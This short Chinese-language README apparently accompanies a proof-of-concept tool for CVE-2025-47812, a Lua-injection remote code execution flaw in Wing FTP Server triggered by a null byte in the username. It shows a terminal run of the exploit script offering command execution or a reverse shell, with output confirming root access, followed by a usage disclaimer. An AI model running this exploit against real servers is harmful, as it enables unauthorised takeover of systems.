
CVE-2025-47812
CVE-2025-47812 是一个影响 7.4.4 版本之前 Wing FTP Server 的严重远程代码执行 (RCE) 漏洞。该漏洞由一名安全研究人员发现,并已被确认在野外被积极利用。
该漏洞存在于 Wing FTP Server 的身份验证逻辑中,具体在于其处理 username 参数中的空字节 (\0) 的方式。
攻击者可以通过用户名字段注入任意 Lua 代码,服务器会将其写入会话文件。当后续处理该会话文件时,注入的 Lua 代码会被执行,从而允许攻击者运行系统级命令。
/loginok.html。┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-47812.py
============================================================
CVE-2025-47812 - Wing FTP Server RCE Exploit
============================================================
Target URL (e.g., http://localhost:5466): http://10.10.10.10
Username (e.g., anonymous): anonymous
1) Run Command
2) Get Reverse Shell
Your choice (1 or 2): 1
Command to execute (default: whoami): id
[*] Trying to get UID... Payload: id
[*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
[*] Sending /dir.html request...
[*] HTTP 200
------ Response Start ------
uid=0(root) gid=0(root) groups=0(root)
<?xml version="1.0" encoding="UTF-8" ?>
<alldata><nowdir><![CDATA[/]]></nowdir>
<dirdata>
</dirdata>
<nowquota>0</nowquota>
<maxquota>0</maxquota>
<readfile>1</readfile>
</alldata>
------ Response End ------
本利用代码仅供教育目的使用。 请负责任地使用,并且仅在获得明确授权的系统上进行测试。 作者不对因使用本工具造成的任何滥用或损害负责。